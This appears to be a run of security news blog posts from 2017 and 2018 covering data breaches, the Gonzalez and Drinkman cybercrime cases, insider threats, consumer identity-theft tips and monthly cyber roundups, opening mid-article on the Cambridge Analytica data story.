Christopher Wylie, a whistleblower and formed collaborator of Aleksandr Kogan, said the data has not been deleted and brought proof to the New York Times and the Guardian.

“Facebook could see it was happening,” said Wylie in an interview with the Guardian. “Their security protocols were triggered because Kogan’s apps were pulling this enormous amount of data, but apparently Kogan told them it was for academic use. So they were like, ‘Fine’. Facebook made zero effort to get the data back.”

7 Digital Safety Tips for Teens Filing Their First Tax Returns

Landing that first part-time job in high school and filing your first tax return is a rite of passage for a young person. So why am I so anxious about my daughter becoming a taxpayer and sharing her pristine personal data with the U.S. government?

Where do I begin? The fact is, the more widely her personal information travels, the more digital risks she faces. Adding to my angst is my own experience with identity theft over a decade ago that still haunts me and is the last stress I’d wish upon my child or anyone else’s.

So as my daughter waves her W-2 at me and elatedly chatters about how she’s going to spend her refund, I — like so many other parents across the country — put on my coach’s hat for a key talk around the digital risks that come with tax season.

7 Tax Filing Safety Tips for Families

  1. Allow your child to file. Sometimes it’s easier just to file a 1040-EZ form for your child and be done with it. The wiser route is to take the time to teach your child the few steps needed to file correctly and the legal reasons we all must pay taxes. Part of this discussion is going over the digital risks of tax season such as identity theft, malware and viruses, tax fraud, and identity theft.
  2. Discuss the power of a SSN. Talk about the responsibility and power of owning a Social Security Number (SSN) and why it must be safeguarded. A SSN is the most critical piece of government-issued identification an American citizen can possess. It is tied to personal credit, identification, and is the primary way the way the government tracks earnings of an individual during his or her lifetime. The SSN is the golden ticket for cyber thieves who make a career of stealing and selling social security numbers and identities online.
  3. Secure all digital doorways. One of the ways cyber thieves gain access to personal information is through hacking, and the best way to slam that door is by creating strong passwords. Easy passwords are the #1 way hackers unlock our data. Tax time is a perfect opportunity to challenge your child to create stronger passwords for all of his or her devices and email accounts. At the same time you upgrade password security, make sure updates on software, PCs, phones, and web browsers are current to protect your devices against viruses and malware that can grab login information.
  4. File early. Start the habit of early filing. The sooner you file your tax return and teach your child to do the same, the more you lessen the chance of a thief using yours or your child’s identity to claim a refund before your return goes through. According to the Identity Theft Resource Center, tax return fraud is on the rise due to more significant security breaches and the number of identities now for sale online.
  5. Be overly cautious every step of the way. Use a reputable firm or company to handle yours and your child’s tax return. Legitimate tax preparers must sign all forms with their IRS preparer identification number. If you end up filing the 1040-EZ form on paper, be sure to hand deliver your returns to the post office mailbox. Thieves target March and April as prime for stealing tax information from curbside, residential mailboxes. Filing online? That’s fine if you make sure you do so over secured wifi. The local coffee shop or library isn’t going to protect your tax information from unscrupulous, prying eyes. Look for the HTTPS web designation at the front of the Internal Revenue System’s web address before submitting your documents.
  6. File a fraud alert. Because your child has rarely used his or her social security number, set up a fraud alert. By submitting a fraud alert in your child’s name with the three main credit bureaus several times a year, you will be able to catch any credit fraud early. Since your child hasn’t built any credit, anything that comes back will be illegal activity. The fraud alert will remain in place for only 90 days. When the time runs out, you’ll need to reactivate the alert. You can achieve the same thing by filing an earnings report from the Social Security Administration. The report will reveal any earnings acquired under your child’s social security number.
  7. Celebrate. Tax time tends to bring out the anxiety in just about everyone. Change that mentality with your child if possible. Make tax time rewarding. Go out for a celebration dinner or dessert. Congratulate him or her on filing safely and responsibly. And, don’t forget to recognize the even bigger accomplishment of stepping into the workforce and taking on the challenge of a first job.

This post is the first of a two-part series focused on digital safety during tax season. Next week, we will highlight some of the scams thieves use and how to safeguard your family.

toni page birdsong

 

 

Toni Birdsong is a Family Safety Evangelist to McAfee. You can find her on Twitter @McAfee_Family. (Disclosures). 

The post 7 Digital Safety Tips for Teens Filing Their First Tax Returns appeared first on McAfee Blogs.

UK at growing risk of major cyber incidents, terrorist attacks, research suggests

New data from a report on the UK threat landscape indicates the country’s emergency services are at risk of a major cyber-attack, which could open the door to terrorist attacks as well. Historically, the sovereign country has had one of the highest rates of malware incidents.

The UK Threat Landscape report explores the UK’s Critical National Infrastructure against threats and possible vulnerabilities. Intelligence firm Anomali, which conducted the research, claims to have found a number of “weak spots” in the UK which could attract cyber attacks, and possibly even terrorist attacks.

The Defence Equipment and Supply Organisation, for example, presents a prime target for actors seeking to disrupt defense procurement. Emergency services don’t fall far behind. Nearly just as vulnerable is the UK’s energy infrastructure, with 21% of all electricity generated by 15 nuclear reactors, all owned by a single entity – EDF Energy.

“This combination of monopoly of ownership and geographic clustering means that the civil nuclear sector is constantly on a high state of alert for a terrorist and cyber-attack,” researchers say.

A number of attacks have already had huge effects on critical infrastructures across the UK. One recent example is the WannaCry ransomware epidemic in May 2017, which forced a third of the UK’s NHS hospitals to shut down operations, putting thousands of lives at risk. Of course, healthcare was not the only industry in the UK affected by the attack.

Critical infrastructure in the UK, as defined by the Centre for the Protection of National Infrastructure, includes such sectors as chemical, civil nuclear, communications, defense, emergency services, energy, finance, food, government, health, space, transport and water.

The UK, with the sixth-largest economy in the world, is a primary target for APT groups, cyber criminals and hacktivists. Analysts believe that Brexit presents geopolitical changes that will further factor into the overall threat landscape for the country.

Drinkman and Smilianets Sentenced: The End to Our Longest Databreach Saga?

On Thursday, February 15, 2018, we may have finally reached the end of the Albert Gonzalez Databreach Saga.  Vladimir Drinkman, age 37, was sentenced to 144 months in prison, after pleading guilty before U.S. District Judge Jerome Simandle in New Jersey.  His colleague, Dmitriy Smilianets, age 34, had also pleased guilty and was sentenced to 51 months and 21 days in prison (which is basically "time served", so he'll walk immediately).  The pair were actually arrested in the Netherlands on June 28, 2012, and the guilty pleas had happened in September 2015th after they were extradited to New Jersey.

Those who follow data breaches will certainly be familiar with Albert Gonzalez, but may not realize how far back his criminal career goes.

On July 24, 2003, the NYPD arrested Gonzalez in front of a Chase Bank ATM at 2219 Broadway found Gonzalez in possession of 15 counterfeit Chase ATM cards and $3,000 in cash. (See case 1:09-cr-00626-JBS).  After that arrest, Gonzalez was taken under the wing of a pair of Secret Service agents, David Esposito and Steve Ward.  Gonzalez describes some of the activities he engaged in during his time as a CI in his 53 page appeal that he files March 24, 2011 from his prison cell in Milan, Michigan.

At one point, he claims that he explained to Agent Ward that he owed a Russian criminal $5,000 and he couldn't afford to pay it.  According to his appeal, he claims Ward told him to "Go do your thing, just don't get caught" and that Agent Ward later asked him if he had "handled it." Because of this, Gonzalez (who again, according to his own sentencing memo, likely has Asperger's) claims he believed that he had permission to hack, as long as he didn't get caught.

Over Christmas 2007, Gonzalez and his crew hacked Heartland Payments Systems and stole around 130 million credit and debit cards.  He was also charged with hacking 7-Eleven (August 2007), Hannaford Brothers (November 2007) where he stole 4.2 million credit and debit cards. Two additional data breaches against "Company A" and "Company B" were also listed as victims.  In Gonzalez's indictment, it refers to "HACKER 1 who resided in or near Russia" and "HACKER 2 who resided in or near Russia."  Another co-conspirator "PT" was later identified as Patrick Toey, a resident of Virginia Beach, VA.  (Patrick Toey's sentencing memorandum is a fascinating document that describes his first "Cash out trip" working for Albert Gonzalez in 2003. Toey describes being a high school drop out who smoked marijuana and drank heavily who was "put on a bus to New York" by his mother to do the cash out run because she needed rent money.  Toey later moved in with Gonzalez in Miami, where he describes hacking Forever 21 "for Gonzalez" among other hacks.

Gonzalez's extracurricular activities caught up with him when Maksym Yastremskiy (AKA Maksik) was arrested in Turkey.  Another point of Gonzalez's appeal was to say that Maksik was tortured by Turkish police, and that without said torture, he never would have confessed, which would have meant that Gonzalez (then acting online as "Segvec") would never have been identified or arrested.  Gonzalez claims that he suffered from an inadequate defense, because his lawyer should have objected to the evidence "obtained under torture."  These charges against Gonzalez were tried in the Eastern District of New York (2:08-cr-00160-SJF-AKT) and proved that Gonzalez was part of the Dave & Buster's data breach

On December 15, 2009, Gonzalez tried to shrug off some of his federal charges by filing a sentencing memo claiming that he lacked the "capacity to knowingly evaluate the wrongfulness of his actions" and asserting that his criminal behavior "was consistent with description of the Asperger's discorder" and that he exhibited characteristics of "Internet addiction."  Two weeks later, after fighting that the court could not conduct their own psychological exam, Gonzalez signed a guilty plea, agreeing that the prosecutor would try to limit his sentence to 17 years. He is currently imprisoned in Yazoo, Mississippi (FBOP # 25702-050) scheduled to be released October 29, 2025.

Eventually "HACKER 1" and "HACKER 2" were indicted themselves in April 2012, with an arrest warrant issued in July 2012, but due to criminals still at large, the indictment was not unsealed until December 18, 2013. HACKER 1 was Drinkman.  HACKER 2 was Alexandr Kalinin, who was also indicted with Drinkman and Smilianets.

Shortly after the Target Data Breach, I created a presentation called "Target Data Breach: Lessons Learned" which drew heavily on the history of Drinkman and Smilianets. Some of their documented data breaches included:
VictimDateDamages
NASDAQMay 2007  loss of control
7-ELEVEN August 2007
Carrefour October 2007 2 million cards
JCPenneyOctober 2007
HannafordNovember 2007 4.2 million cards
Wet SealJanuary 2008
CommideaNovember 2008 30 million cards
Dexia Bank BelgiumFeb'08-Feb'09
Jet BlueJan'08 to Feb '11
Dow Jones2009
EuroNetJul '10 to Oct '11  2 million cards
Visa JordanFeb-Mar '11  800,000 cards
Global Payments SystemsJan '11 to Mar '12
Diners Club SingaporeJun '11
IngenicardMar '12 to Dec '12

During the time of these attacks, Dimitry Smilianets was also leading the video game world.  His team, The Moscow 5, were the "Intel Extreme Masters" champions in the first League of Legends championship, also placing in the CounterStrike category.   Smilianets turned out not to be the hacker, but rather specialized in selling the credit cards that the other team members stole.  Steal a few hundred million credit cards and you can buy a nice gaming rig!

Smilianets with his World Champion League of Legends team in 2012

 How did these databreaches work?


Lockheed Martin's famous paper "Intelligence-Driven Computer Network Defense Informed by Analysis of Adversary Campaigns and Intrusion Kill Chains" laid out the phases of an attack like this:

But my friend Daniel Clemens had explained these same phases to me when he was teaching me the basics of Penetration Testing years before when he was first starting Packet Ninjas!

1. External Recon - Gonzalez and his crew scan for Internet-facing SQL servers
2. Attack (Dan calls this "Establishing a Foothold") - using common SQL configuration weaknesses, they caused a set of additional tools to be downloaded from the Internet
3. Internal Recon - these tools included a Password Dumper, Password Cracker, Port Scanner,  and tools for bulk exporting data
4. Expand (Dan calls this "Creating a Stronghold")  - usually this consisted with monitoring the network until they found a Domain Admin userid and password.  (for example, in the Heartland Payments attack, the VERITAS userid was found to have the password "BACKUP" which unlocked every server on the network!
5. Dominate - Gonzalez' crew would then schedule an SQL script to run a nightly dump their card data
6. Exfiltrate - data sent to remote servers via an outbound FTP.

In Rolling Stone, Gonzalez claims he compromised more than 250 networks
In the Rolling Stone article, "Sex, Drugs, and the Biggest Cybercrime of All Time" , Steven Watt, who was charged in Massachusetts for providing attack tools to Gonzalez in October 2008.  Watt's tools were used in breaches, including BJ's Wholesale Club, Boston Market, Barnes & Noble, Sports Authority, Forever 21, DSW, and OfficeMax.  As part of his sentencing, Watt was ordered to repay $171.5 Million dollars.

Almost all of those databreaches followed the same model ... scan, SQL Inject, download tools, plant a foothold, convert it to a stronghold by becoming a domain admin, dominate the network, and exfiltrate the data. 

How did the TARGET Data breach happen, by the way?  Target is still listed as being "Unsolved" ...   but let's review.  An SQL injection led to downloaded tools, (including NetCat, PSExec, QuarksPWDump, ElcomSoft's Proactive Password Auditor, SomarSoft's DumpSec, Angry IP Scanner (for finding database servers), and Microsoft's OSQL and BCP (Bulk Copy)), a Domain Admin password was found (in Target's case, a BMC server monitoring tool running the default password), the POS Malware was installed, and data exfiltration begun. 

Sound familiar???

Justice?

With most of Gonzalez's crew in prison by 2010, the data breaches kept right on coming, thanks to Drinkman and Smilianets. 

Drinkman, the hacker, was sentenced to 144 months in prison.
Smilianets, the card broker, was sentenced to 51 months and 21 days, which was basically "time served" -- he was extradited to the US on September 7, 2012, so he'll basically walk.

Will Smilianets return to video gaming? to money laundering? or perhaps choose to go straight?

Meanwhile, Alexandr Kalinin, of St. Petersburg, Russia; Mikhail Rytikov, of Odessa, Ukraine; and Roman Kotov, of Moscow, Russia, are all still at large.  Have they learned from the fate of their co-conspirators? or are they in all likelihood, scanning networks for SQL servers, injecting them, dropping tools, planting footholds, creating strongholds, and exfiltrating credit card data from American companies every day?

Kalinin (AKA Grig, AKA "g", AKA "tempo") is wanted for hacking NASDAQ and planting malware that ran on the NASDAQ networks from 2008 to 2010.  (See the indictment in the Southern District of New York, filed 24JUL2013 ==> 1:13-cr-00548-ALC )

Mykhailo Sergiyovych Rytikov is wanted in the Western District of Pennsylvania for his role in a major Zeus malware case.  Rytikov leased servers to other malware operators.  Rytikov is also indicted in the Eastern District of Virginia along with Andriy DERKACH for running a "Dumps Checking Service" that processed at least 1.8 million credit cards in the first half of 2009 and that directly led to more than $12M in fraud.  ( 1:12-cr-00522-AJT filed 08AUG2013.)  Rytikov did have a New York attorney presenting a defense in the case -- Arkady Bukh argues that while Rytikov is definitely involved in web-hosting, he isn't responsible for what happens on the websites he hosts.

Roman Kotov, and Rytikov and Kalinin, are still wanted in New Jersey as part of the case 1:09-cr-00626-JBS (Chief Judge Jerome B. Simandle ). This is the same case Drinkman and Smilianets were just sentenced under.

Insider Threats – Recognize and Respond to the Risk Within

Ninety percent of organizations feel vulnerable to insider threats.  That alarming statistic was recently published in the annual Insider Threat Report released by Crowd Research Partners. The survey respondents are almost equally worried about malicious insiders (47%) as they are accidental insiders (51%). What is one of the main enabling risk factors? Too many users with excessive access privileges.  When those access privileges are in the hands of a malicious insider the risks are significant. A disgruntled employee, or a non-deprovisioned ex-employee that feels wronged by their employer, possess two key components needed to cause damage: access and motivation.  

Disgruntled/Rogue Employee 

Consider this example: Andrew Skelton, a senior IT auditor employed by Morrisons Supermarket PLC, deliberately leaked the payroll information of approximately 100,000 current and former Morrisons employees to a file sharing website and to three English newspapers. What was his motivation? Mr. Skelton held a grudge against Morrisons due to an earlier internal disciplinary matter. As a result of the data breach, over 5,000 current and former Morrisons employees filed a class action suit against Morrisons for damages incurred. In December 2017, England’s High Court of Justice Queens Bench Division ruled that Morrisons is vicariously liable for the actions of the disgruntled employee, Mr. Skelton. Clearly, privileged access in the hands of a disgruntled employee can produce extensive and far-reaching damage. 

The Ex-Employee 

A survey conducted by OneLogin produced another alarming statistic; fifty percent of ex-employees retain access to corporate applications after their employment has ended. When you consider that most disgruntled employees will end up leaving, either voluntarily or not, failure to deprovision means access and motivation are in place to initiate a devastating attack.  Even if the employment is ended on friendly terms, the ex-employee could be recruited by malicious actors offering financial incentives for their access. The risk is very real. Twenty percent of the companies represented in the OneLogin survey experienced a data breach due to failure to deprovision an employee. Consider this example: Brian P. Johnson, IT specialist and systems administrator, for Georgia-Pacific had his employment terminated on February 14, 2014 and was escorted off the premises. However, his access to corporate applications remained in place. He used his access to transmit harmful code and commands; in some instances, bringing Georgia-Pacific’s Port Hudson’s mill production to a standstill. FBI agents assigned to investigate the case concluded that Mr. Johnson intentionally sabotaged his former employer as payback.  

As these data breaches show, failure to deprovision an ex-employee and failure to recognize and monitor a disgruntled employee led to significant losses to both company reputation and revenue.   

Recognize and Respond 

All employees require knowledge or access to empower them to do their work. However, it’s noteworthy that ‘too many users with excessive access privileges’ was identified as an enabling risk factor.  Clearly, policies that limit access should be in place and implemented to minimize insider threat risk, whether malicious or accidental.  Employee education combined with guidelines and policies for recognizing and monitoring a rogue/disgruntled employee are necessary for security threat management. When the employment termination process begins clear procedures to promptly remove access to corporate applications are vital. This article by the CERT Division of the Software Engineering Institute (SEI) provides a list of 19 best practices that can help mitigate the risk of IP theft, IT sabotage, and fraud that may exist due to a disgruntled or ex-employee. It’s true that you can never reduce your risk of an insider threat to zero. However, by recognizing and responding to the risk through preparation and education it can be minimized.  

“By failing to prepare, you are preparing to fail.”  – Benjamin Franklin 

Sources: 

https://www.ca.com/content/dam/ca/us/files/ebook/insider-threat-report.pdf 

https://www.social-engineer.org/framework/general-discussion/categories-social-engineers/disgruntled-employees/ 

https://www.judiciary.gov.uk/wp-content/uploads/2017/12/morrisons_approved_judgment.pdf 

https://www.justice.gov/usao-mdla/pr/former-systems-administrator-sentenced-prison-hacking-industrial-facility-computer 

https://www.onelogin.com/press-center/press-releases/new-research-from-onelogin-finds-over-50-of-ex-employees-still-have-access-to-corporate-applications 

https://www.cert.org/insider-threat/best-practices/ 

The post Insider Threats – Recognize and Respond to the Risk Within appeared first on Security Through Education.

India’s Biometric Database Reportedly Breached, More Than One Billion Compromised

Between Equifax and Uber, there’s been a plethora of massive data breaches lately. These breaches not only compromise personal data, but they’re also leaving those impacted concerned about potential identity theft as a result. Now, India is faced with their largest data breach yet – as their governmental database Aadhaar has reportedly been compromised, which could affect the personal data of practically all of its 1.3 billion citizens.

How did this happen, exactly? Let’s start back in 2010 when, according to Buzzfeed, India started scanning personal details like names, addresses, dates of birth, mobile numbers, and more, along with all 10 fingerprints and iris scans of its 1.3 billion citizens, into a centralized government database called Aadhaar to create a voluntary identity system.

Fast forward to current day, and all of this crucial data is simply handed over to the Tribune newspaper for a whopping $8. The publication said its reporters were able to access names, email addresses, phone numbers and postal codes simply by paying an individual $8, who provided them access to the database. What’s more – for another $5 dollars, the same individual offered the reporters unique identification cards (called Aadhaar cards) that can be used to access various government services. The individual responsible for the leak is apparently part of a larger group that was able to access the giant database through former Aadhaar workers.

Mind you, there’s still a lot of speculation and questions around this massive leak with the government authority that oversees the database claiming that the data is “fully safe and secure.” However, one thing is for sure, the entire country’s population needs to be on alert for their personal data becoming compromised, or even potential identity theft.

So, what can these citizens do to ensure their personal information stays secure? Start with these tips:

  • Regularly review your online account info. Things like regularly reviewing transactions online and making sure account contact info hasn’t changed are also good for keeping tabs on anyone trying to hijack your account.
  • Set up an alert. If you know there’s a chance your personal data has been compromised, place a fraud alert on your credit so that any new or recent requests undergo scrutiny. This also entitles you to extra copies of your credit report so you can check for anything suspicious. If you find an account you did not open, report it to the police or Federal Trade Commission, as well as the creditor involved so you can close the fraudulent account.
  • Consider an identity theft protection solution. With this breach and others before it, consumers have been focused on stay protected against identity theft. That’s why, just this week, McAfee announced a solution that aids with exactly that. McAfee Identity Theft Protection allows users to take a proactive approach to protecting their identities with personal and financial monitoring and recovery tools to help keep their identities personal and secured.

And, of course, stay on top of the latest consumer and mobile security threats by following me and @McAfee_Home on Twitter, and ‘Like’ us on Facebook.

The post India’s Biometric Database Reportedly Breached, More Than One Billion Compromised appeared first on McAfee Blogs.

Cyber Security Roundup for December 2017

UK supermarket giant Morrisons, lost a landmark data breach court case in December after a disgruntled Morrisons employee had stolen and posted the personal records of 100,000 co-workers online, the supermarket chain was held liable for the data breach by the UK High Court. The High Court ruling now allows those affected to claim compensation for the "upset and distress" caused. Morrisons said it believed it should not have been held responsible and would be appealing against the decision. If the appeal is lost it could open up the possibility of further class action lawsuits cases by individuals. Pending the GDPR becoming law in May 2018, such a court ruling sets a legal precedent for individuals to claim damages after personal data losses by companies through the courts as well. After May 2018, the GDPR grants individuals the right sue companies for damages following personal data breaches. So we can expect 'ambulance chasers' lawyers to pick up on this aspect of the GDPR, with class action lawsuits following data breaches, it well could become the new "P.P.I. industry"

Any businesses or individuals using Kaspersky should be aware the UK National Cyber Security Centre has warned government agencies against using the Russian supplier’s products and services, which follows a ban by US government departments in November. Barclays responded to the warning by stopping their free offering of Kaspersky anti-virus products to its customers. 2017 saw Cyber Security become a political football, so it is no real surprise that the UK and US once again blamed North Korea for the devasting WannaCry attacks earlier in the year, personally, I blame poor patch management and hackers, not the North Korea cyber army!

Nadine Dorries MP got herself in hot water after trying to defend now former political colleague Damian Green, following claims of Mr.Green accessed porn on his Parliment computer. This was activity was reported by a retired Police officer, which was said to be a breach of the data protection act. Nadine tweeted "my staff log onto my computer on my desk with my login everyday" to suggest anyone could have used Damian Green's PC to access the illicit websites. This led to widespread condemnation and a warning by ICO to MPs on password sharing. 

The fact illicit websites were not blocked by Parliament systems is one concerning lack security issue, but the flagrant disregard for basic cybersecurity by government MPs is gobsmacking, especially when you consider they are supposed to be understanding the risk and setting laws to protect UK citizens from cyber attacks and data breaches. Its another "slap palm on head" after the last UK Prime Minister announced he wanted to ban encryption.

2017 has seen huge rises in cryptocurrencies values, which has placed cryptocurrency brokers and user crypto coin wallets in the sights of cybercriminals. This month mining platform NiceHash was breached by hackers, who stole £51 million worth of Bitcoin and Bitcoin exchange Youbit, which lets people buy and sell Bitcoins and other virtual currencies, shut down and filed for bankruptcy after losing 17% of its assets in the cyber-attacks. I think we can expect further cryptocurrencies attacks in 2018 given the cryptocurrency bubble is yet to burst.

Faked LinkedIn profiles are nothing new, however, the German Intelligence Agency (BfV) said it had spotted China were using faked LinkedIn profiles to connect with and gather information on German officials and politicians, which is an interesting development.

Finally, Hackers were reported as taking advantage of poorly secured systems at UK private schools, and it was claimed hackers could turn off heating systems at UK schools and military bases.

NEWS
AWARENESS, EDUCATION AND THREAT INTELLIGENCE
REPORTS

The Year Cybersecurity Made Primetime

Grey-Sloan Memorial Hospital, the fictional hospital on the television drama “Grey’s Anatomy,” was suddenly brought to a halt Nov. 14 at the hands of ransomware. The No. 3 drama on broadcast television, a venerable franchise of 14 seasons and 300 episodes, reflected the harsh reality faced by many. WannaCry, Petya, and Equifax entered dinner table conversation and late-night talk show monologues. In 2017 cybercrime made primetime.

Shonda Rhimes, creator of “Grey’s Anatomy,” tweets about ransomware hits Grey-Sloan Memorial

The events that transpired this year put cybersecurity on everyone’s mind. The stories of ransomware and malware found their way into homes, schools, and businesses – everyday life.

The Attacks That Changed Everything

In May, the ransomware WannaCry took center stage. True to its name, WannaCry was worth its weight in tears: 150 countries impacted, 250,000 machines infected, 16 United Kingdom medical centers taken down, all in just one day. The ransom was paid, and expert analysis ensued. The motive: disruption. As Raj Samani, Chief Scientist at McAfee stated: “The game has changed. The reality is that any organization can hire someone to disrupt a competitor’s business operations for less than the price of a cup of coffee.”

Taking cues from WannaCry, the Petya/NotPetya malware emerged a month later as its successor. The next global cyberattack leveraged the same vulnerability, but was nastier when infecting systems. Instead of locking away files and extorting money from victims, Petya/NotPetya was a wiper – deleting all files from affected devices.

The threat landscape was not just populated by cyberattacks, but also a data breach deemed the worst in recent memory. The Equifax breach exposed crucial personal identification of roughly 143 million consumers in the United States. This data included names, addresses, birthdates, driver’s license data and Social Security numbers. “We need to view the Equifax breach as a catalyst moment for rethinking the way we handle identification for U.S. citizens,” said Steve Grobman, senior vice president and chief technology officer for McAfee.

Rethink we did. These attacks, and other notable ones such as Bad Rabbit, the Uber data breach, the KRACK Wi-Fi attack, and more, changed how the cybersecurity industry responds to threats.

Cause and Effect

These attacks moved the needle. Cybercriminals were upping their game. These attacks mandated that cybersecurity must be faster, smarter, and more effective. Christiaan Beek, lead scientist and principal engineer at McAfee, says our improved response time to ransomware attacks confirms that’s happening: “The cybersecurity world is indeed responding faster than before, especially after WannaCry, which was another wake-up call… The moment researchers see that a decryptor is available, we go on and continue to hunt down the next one or learn from the previous ones and start innovating or fine-tuning our products.”

Looking Ahead

Now that cybersecurity is on prime time, what happens? We’re paying attention. Does that mean we’re prepared?

McAfee Chief Executive Officer Chris Young thinks we still have a ways to go. “It’s nearly 2018. And from the discussions I have weekly, it’s clear that business leaders understand far more about the risk of cyber threats today than they did even a few years ago. However, so many business leaders I talk to still want to know if they’re doing everything they can to protect their companies. Answer: They’re not.”

Young recommends a “Culture of Security” –– a paradigm shift in philosophy and approach from the executive boardroom to new employees on their first day. Leaders must demonstrate a new priority, whether it’s impeccable password and virtual private network use, or cloud computing adoption only under the guidance of cybersecurity professionals. “Businesses need to think security first,” Young says. “Whether that’s in designing new products and services, signing partnership agreements, in hiring new employees, or anything else.”

Malware is not the star of the show. It’s the villain, but a powerful one. Cybersecurity must adapt to address it. McAfee wrapped up 2017 by announcing the upcoming acquisition of cloud provider Skyhigh Networks, which will become part of the McAfee Cloud Security Business Unit. Skyhigh will join a McAfee portfolio that includes market-leading products in the endpoint and security operations center (SOC). Partnering in an open ecosystem pulls these major strengths together in a new and agile way.

Welcome, 2018. New tools and a new “Culture of Security” are ready to take on new threats.

The post The Year Cybersecurity Made Primetime appeared first on McAfee Blogs.

What Leakbase Going Dark Means for the Data Breach Lifecycle

“Big Company Hit with Data Breach, Millions of Users Impacted.” An all too familiar news title, for an all too familiar issue. It almost seems that each week we read about a new data breach in the news. We learn how it happened, what the hackers went after, and the ramifications. Those affected scan their credit, potentially chopping up compromised cards. But what happens after that?

A data breach is just that – data that has been breached. After they’ve attacked an organization, hackers have barrels of stolen information just sitting in their laptops. So, the next question for black hats is often – what do we do with this stolen data? Answer: turn it into profit.

That’s where sites like Leakbase come into play. These crooks can hand over this stolen data to Leakbase, which is a website that has indexed and sold access to billions of usernames and passwords swiped in some of the world’s largest data breaches. Leakbase began its operations in late 2016, advertising access to crucial data stolen from data breaches involving LinkedIn, Myspace, and Dropbox. That is until this week when the site suddenly went dark, discontinuing their service entirely.  In fact, after being discontinued, the domain was redirected to Troy Hunt’s https://haveibeenpwned.com/ site, which actually allows anyone to check to see if specific email addresses have been involved in a data breach. There’s speculation that Dutch law enforcement has been involved in this shutdown, but as of now it remains only that – speculation.

So, even though Leakbase is gone, the existence of the site and others like it serves as an important reminder that the impact of data breaches reverberates louder and longer than we may imagine. “Warehouses of stolen data extend the risk of breaches,” says Christian Beek, lead scientist and principal engineer at McAfee, who helped identify this trend in cybercrime in a 2017 Threats Predictions report.

Beek says the same thing goes for cloud data services, which can be mined for valuable information while also allowing criminals to change and hide their own identities. “The same cloud capabilities that help businesses can also house stolen data and help bad guys constantly cycle through their own information, making them harder to track.” Beek says this brings home the need for evolving security operations centers connected to a community. “If it’s you vs. them, it’s very hard. If it’s all of us vs. them, we have much better odds.”

To learn more about Leakbase and the ramifications of data breaches, be sure to follow us at @McAfee and @McAfee_Labs.

The post What Leakbase Going Dark Means for the Data Breach Lifecycle appeared first on McAfee Blogs.

Cyber Security Roundup for November 2017

One of the most notable data breaches disclosed this month was by Uber, given the company attempted to cover up the breach by paying off hackers. Over a year ago the transport tech firm was said to have paid £75,000 to two hackers to delete 57 million Uber account records which they had stolen. Uber revealed around 2.7 million of the stolen records were British riders and drivers. As a UK Uber rider, this could mean me, I haven't received any notification of the data breach from Uber as yet. The stolen information included names, email addresses, and phone numbers. Uber can expect enforcement action from regulators on both sides of the pond, the UK Information Commissioner's Office (ICO) said it had "huge concerns" about the breach and was investigating.

Jewson, Cash Converters, and Imgur all reported losing data due to hacks this month, while Equifax has reported suffering significant negative financial losses following their high profile hack of personal customer data. Equifax reported their net income had dropped by £20 million due to the hack, and their breach bill was coming in at a whopping £67 million.

November was a very busy month for security patches releases, with Microsoft, Apple, Adobe, Oracle, Cisco and Intel releasing a raft of patches to fix critical vulnerabilities. Apple even had to quickly release an emergency patch at end of November to fix a root access flaw reported in macOS High Sierra version 10.13.1. So just keep patching everything IT to ensure you and your business stays ahead of enterprising cybercriminals, the Equifax breach is a prime example of what can go wrong if system patching is neglected.

November also saw Open Web Application Security Project (OWASP) finally released an updated version to its Top Ten application vulnerabilities list, which is a ‘must know’ secure coding best practice for all software developers and security testers, especially considering that Akamai reported web application attacks had increased by 69% in the third quarter of 2017. Look out for an updated OWASP Top Ten IBM DeveloperWorks Guidance from me in December to reflect the updated list.

NEWS
AWARENESS, EDUCATION AND THREAT INTELLIGENCE
REPORTS

Cyber Security Roundup for October 2017

State-orchestrated cyber attacks have dominated the media headlines in October, with rogue state North Korea and its alleged 6,800 strong cyber force blamed for several cyber attacks. International intelligence scholars believe the North Korean leadership are using cyber warfare to up the political ante with their ongoing dispute with the United States. The North Koreans, as well as terrible security practices, were directly blamed by the UK National Audit Office for the recent NHS WannaCry attack (despite North Korea denying it). North Korea was also reported to be implicated in the stealing US War Plans from South Korea, and for a spear phishing campaign against the US Power Grid. The possible Russian manipulation of the US election with cyber attacks and rogue social media campaigns is still a story not going away, while the Chinese are alleged to be behind the data theft of Australian F-35 fighter jet, in what is described as an 'extensive' Cyberattack. The finger was pointed at Iran for the recent Parliamentary Emails cyber attacks in the UK, meanwhile, EU governments venting their cyber concern, warning that Cyber Attacks can be an Act of War.

Stephen Hawking caused controversy in both the science and tech industry last year when he said Artificial Intelligence could be a serious threat to human existence, could the plot of The Terminator really come to fruition? Perhaps so, as it was reported that AI had already defeated the Captcha Security Check system. Personally, I believe both AI and Quantum Computing will pose significant new threats to cybersecurity space in the next decade.

A far higher number of personal records were compromised in the Equifax data breach than was previously thought, with millions of UK citizens confirmed to be impacted by the US-based credit checking agency hack. Equifax’s now ex-CEO provided an interesting blow-by-blow account of the cyber-attack at a US government hearing, even though Equifax technical staff were specifically warned about a critical Apache Struts (web server) patch, it was ignored and not applied, which in turn allowed hackers to take full advantage of vulnerability to steal the Equifax data on mass. To make matters even worse, the Equifax consumer breach help website was found to be infecting visitors with spyware.

Yahoo revealed all 3 Billion of its user accounts had in fact been breached, in what is truly an astonishing mammoth sized hack, biggest in all history, so far. Elsewhere on the commercial hacking front, Pizza Hut's website was reported to be hacked with customer financial information taken, and Disqus said a 2012 breach it discovered in October exposed the information of 17.5 million its users from as far back as 2007.

It was a super busy month for security vulnerability notifications and patch releases, with Microsoft, Netgear, Oracle, Google, and Apple all releasing rafts of critical level patches. A serious weakness in the wireless networking WPA2 protocol was made public to great fanfare after researchers suggested all Wifi devices using WPA2 on the planet were vulnerable to an attack called Krack, which exploited the WPA2 weakness. Krack is a man-in-the-middle attack which allows an attacker to eavesdrop or redirect users to fake websites over Wifi networks secured using the WPA2 protocol. At the time of writing most wireless access point vendors and operating system providers had released patches to close the WPA2 vulnerability, and there have been no known exploits of the vulnerability reported in the wild.

BadRabbit is a new strain of ransomware which is emerging and is reported to be infecting systems and networks in Russia and the Ukraine at the moment. BadRabbit is the latest network self-propagating malware, like NotPeyta and WannaCry, to use the NSA EternalRomance hacking tool. A massive new IoT botnet was discovered, its continued growth is fuelled by malware said to be more sophisticated than previous IoT botnet king, Mirai. Russian based threat actor group APT28 is said to be targeting the exploitation of a recently patched Adobe vulnerability (CVE-2017-11292), in using malicious Microsoft Word attachment, so ensure you keep on top of your system patching and always be careful when opening email attachments. 

